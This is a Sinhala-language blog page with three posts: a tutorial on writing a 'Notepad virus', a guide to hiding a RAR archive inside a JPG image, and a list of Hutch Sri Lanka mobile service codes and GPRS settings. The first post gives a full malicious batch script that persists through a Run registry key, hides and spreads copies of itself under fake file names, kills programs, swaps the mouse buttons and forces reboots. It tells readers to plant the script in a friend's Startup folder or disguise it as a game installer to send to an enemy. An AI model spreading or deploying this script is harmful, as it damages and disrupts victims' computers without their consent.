සුපිරිම Notepad Virus ටිකක් හදමුද? 02

සුපිරිම Notepad Virus ටිකක් හදමුද? 02

ඔයාල හැමෝම හොඳින් නේද....? ඔන්න මම එදා දෙනව කිව්ව අනිත් පෝස්ට් එක අරගෙන ආව... හැබැයි ඉතින් මේව දැනගැනීම පිණිස විතරයි හොඳේ ... කාවවත් අමාරුවෙ දාන්නනම් එපා.!
ආ... මම එදා මේව යාලුවට හොරෙන් එයාගෙ පීසී එකේ හන්ගල එයාව බයකරන හැටිත් මම කියලදෙන්නමි කියුවනේ... ඒක ඉස්සෙල්ලම බලමුකො......
Start - All Programs ගිහිල්ල  Startup කියන එක තෝරගෙන Right Click කරල Open කරගන්න. ඊපස්සෙ ඔයා හදාගත්තු වෛරස් එක Copy කරල අර Open කරගත්තු Startup එක මත Past කරන්න. ඊපස්සෙ ඔයා සද්දනැතුව මාරුවෙන්න. එයා ආයෙත් Computer එක On කරපුවහම වෛරස් එක නිකම්ම වැඩ කරනව. කවදහරි එයා ඒ ටික  එතනින් අයින්කරනකම්ම හැමදාව ඒවිදිහට වැඩ කරනව.
මෙන්න අද මම ගෙනාව පට්ටම පට්ට වෛරස් එකක්. මේක ටිකක් බරපතලයි. ඒනිසා ඔයාගෙ පීසී එකේ එහෙම මේක රන් කරන්නනම් එපා. මම වගකියන්නෑ........ ලොකුම ලොකු තරහකාරයෙක් ඉන්නවනම් මොකක්හරි ෆයිල් එකකට දාල (ගේම් එකක සෙටප් එකක් විදිහටවත් ) එයාට යවන්ව.  හැබැයි ඉතින් ඕව මහ පවි වැඩ හොදේ............
මෙන්න කෝඩ් එක

@Echo off
color 4title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.batgoto RIP

මෙ ටික නොට් පැඩ් 1කෙ ගහන්න,ගහලා .bat කියලා සේව් කරන්න...

ඕං එහෙනම් මම ගියා............. ආයෙ දවසක තව ටිකක් දෙන්නම්.. තරහ නැතුව ඉතින් කොමෙන්ටුවකුත් කොටලම යන්න.....




පිංතූරයක් ඇතුලෙ file හංගගන්න දන්නවද?


කොහොමද ඔයාලට...? අදත් මම ආව සුපිරි පෝස්ට් එකක් අරගෙන. පිංතූරයක් ඇතුලෙ file හංගගන්න දන්නවද?  නැත්නමි මම කියලදෙන්නමි.  දැන් වැඩේට බහිමු
ඔක්කොටම කලින් ඔයාගෙ පීසී එකේ Archive Software  එක install කරලද නැත්නමි මේ link එකන් නොමිලේම බාගන්න.
http://software-files-a.cnet.com/s/software/13/79/05/49/wrar510.exe?token=1409280760_0ed9d9f2d3eeb2f7bb4cafbedaacb430&fileName=wrar510.exe
මේ උපකල්පන ටික යොදාගත්තම ලේසි.
පින්තූරෙ නම :image
File එකේ නම: file
Folder එකේ නම: New Folder

පින්තූරෙ හංගන ක්‍රමය                                
මුලින්ම folder එකක් හදා ගෙන ඒක ඇතුලට .JPG කියන format එකේ පින්තුරයත්, හංගන්න ඕනි file එකත් දා ගන්න. (file කීපයක් උනත් කමක් නෑ.) ලේසි තැනක හදා ගන්න. C එකේනම් ගොඩක් හොදයි.

හංගගන්න ඔනෙ file එක උඩ right click කරලා ‘add to Archive’ කියල select කරන්න. file එක compress වෙලා ඒ folder එක ඇතුලෙම පෙනේවි. 

දැන් Start>Run ගිහින් (නැත්නම් windows key +R) cmd කියල type කරලා Enter කරන්න. command prompt window එක පෙනේවි.
ඒකෙදි CD\ කියල type කරලා enter කරන්න.
ඊට පස්සේ ‘cd New folder’ කියල. (New Folder කියන්නෙ පින්තූරය තියන folder එකේ නම.)
C:\New Folder> කියන තැන මේ තියන වචන type කරන්න.

copy /b Image.jpg + File.rar Image.jpg

copy /b ලගට තියෙන්නේ ඔයාලගෙ පින්තූරෙ නම.නම ලිව්වට පස්සෙ space එකක් තිලෙ + ලකුණ දාල space එකක් තියල rar file එකේ නම ලියන්න.ආයිත් space එකක් තියල පින්තූරෙ නම ලියන්න.දැන් enter ඔබන්න.
දැන් බලන්න ගිහින් පින්තූරෙ file size එක වැඩිවෙලා නේද කියල. ඒ කියන්නේ file එක පින්තූරෙ ඇතුලට ගිහින් තියෙන්නේ. ඒ උනාට පින්තූරෙ උඩ click කලාම open වෙන්නෙ පින්තූරෙ විතරයි.

පින්තූරෙ අයින්කරන ක්‍රමය                                

පින්තූරෙ උඩ right click කරලා open with ගිහින් winrar select කලාමfile එක පෙන්නාවි.
open with list එකේ winrar නැත්නම් choose program ගිහින් winrar select කරන්න.

කොහොමද වැඩේ..... පටිටයි නේද...............?
තව පෝස්ටි එකකින් හමුවෙමු. කොමෙන්ටුවක් කොටලම යන්න...................!



HUTCH පාරිභෝගික අපට වැදගත් කරුණු බ්දක්

       HUTCH පාරිභෝගික අපට වැදගත් කරුණු බ්දක්
සේවා භාෂාව වෙනස් කිරීමට
·        සිංහල සදහා 346
·        දෙමළ සදහා 347
·        ඉංග්‍රීසි සදහා 348 අමතන්න
පැකේජය වෙනස් කිරීමට
*551# අමතා ඔබේ පැකේජය වෙනස් කරගන්න
මුදල් එකතුකරන ක්‍රම
Ø 355 අමතා ලැබෙන උපදෙස් පිළිපදින්න
Ø *355*රහස් අංකය# ඇතුළත් කර අමතන්න
අදාළ PIN අංකය 5 වතාවක් වැරදිව සටහන් කළ‍හොත් ඔබගේ ගිණුම ආරක්ෂක හේතූන් මත ක්‍රියා විරහිත වේ. එවිට ඔබේ HUTCH අංකයෙන් 1788 අමතා ඔබට එය යලි සක්‍රීය කරගත හැක.
v  www.hutch.lk/payment_facilities වෙබි අඩවියට පිවිසීමෙන් Online Recharge හරහා ඔබේ ගිණුමට මුදල් එකතු කර ගත හැක.
ගිණුමේ ශේෂය දැනගැනීමට
*344# අමතා SMS පණිවිඩයකින් හෝ 344 අමතා ගිණුමි ශේෂය දැනගත හැක.
IDD ඇමතුම්
IDD ඇමතුම් ලබාගැනීමේදී 00 හෝ (+) සලකුණ යොදා ඊට පසු අදාළ රටේ කේත අංකය සහ දුරකතන අංකය පමණක් ඇතුළත් තරන්න.
උදා 009712212345678
       + 9712212345678
විවිධ රටවල් සදහා වන Country code සහ ගහස්තු දැනගැනීම සදහා අදාළ රටේ නම ටයිප් කර 5544 ට SMS කරන්න.
නැතිවූ හෝ අලාභ හානි වූ සිමිපතක් සදහා නව සිමිපතක් ලබාගැනීම
නව සිමිපතක් ලබාගැනීමට ලගද ඇති ශාකාව දැනගැනීමට www.hutch.lk වෙබි අඩවියට පිවිසෙන්න.
HUTCH 3G
ඩේටා පැකේජයක් සක්‍රීය කරගැනීම සදහා
*131# අමතා කැමති ඩේටා පැකේජයක් තෝරාගන්න.
ගිණුමි ශේෂය ලබා ගැනීම සදහා
*344# අමතා හෝ “BAL” ටයිප්කර 344 ට  SMS කරන්න.
ඔබේ ජංගම දුරකතනයට ඉන්ටර්නෙටි සෙටින් ඇතුළත් කිරීම
Setting: Hutch
Access Point Name (APN): Hutch3g
Proxy IP: 10.220.135.249
Port: 8080
ඔබේ ජංගම දුරකතනයට ඉන්ටර්නෙටි සෙටින් ඇතුළත් කරන ආකාරය දැනගැනීමට www.hutch.lk වෙබි අඩවියට පිවිසෙන්න.
පාරිබෝගික සේවා සදහා අමතන්න
ඕනෑම දුරකතන ජාලයකින් 1788 අමතන්න (hutch දුරකතන හිමියන්ට පළමු ඇමතුමි 5 සදහා ගාස්තු අය නොවේ. වෙනත් ජාල සදහා සාමාන්‍යය ඇමතුමි ගාස්තු අයකෙරේ.)
SMS
ඔබගේ අවශ්‍යතාවය ඇතුළත් SMS පණිවුඩය 5555 ට යොමුකළ පසු hutch කාර්්‍යය මණ්ඩලය ඔබගේ ඉල්ලීම ඉටු කරනු ඇත. (ගාස්තු අය නොවේ)
පිවිසෙන්න
දිවයින පුරා පිහිටි ඕනෑම Hutch ශාකාවක් වෙත යන්න. ඔබගේ ළගම ඇති ශාකාව දැනගැනීමට *123# අමතන්න. නැතහොත් www.hutch.lk වෙබි අඩවියට පිවිසෙන්න.
වැඩි විස්තර
Call: 1788
SMS: 5555
Facebook: hutchsrilanka
Twitter: hutchsrilanka
Post: Hutchison Telecommunications Lanka (Pvt) Ltd,
           234, Galle Rode, Bambalapitiya, Colombo 04.

HUTCH GPRS Setting
Account Name/Connection Name: Hutch WAP
Access Point Name (APN): htwap
Username: (leave it blank)
 Password: (leave it blank)
Proxy Server Address: 010.220.135.249
Proxy Port / Port: 8080
 Home Page: http://wap.hutch.lk
Data Bearer: Packet Data / GPRS
Authentication: Normal
 Pin: 1234 (If requests)
 Connection Type: HTTP


ඕං එහෙනම් මම ගියා...... කමෙන්ටුවක් දාලම යන්න....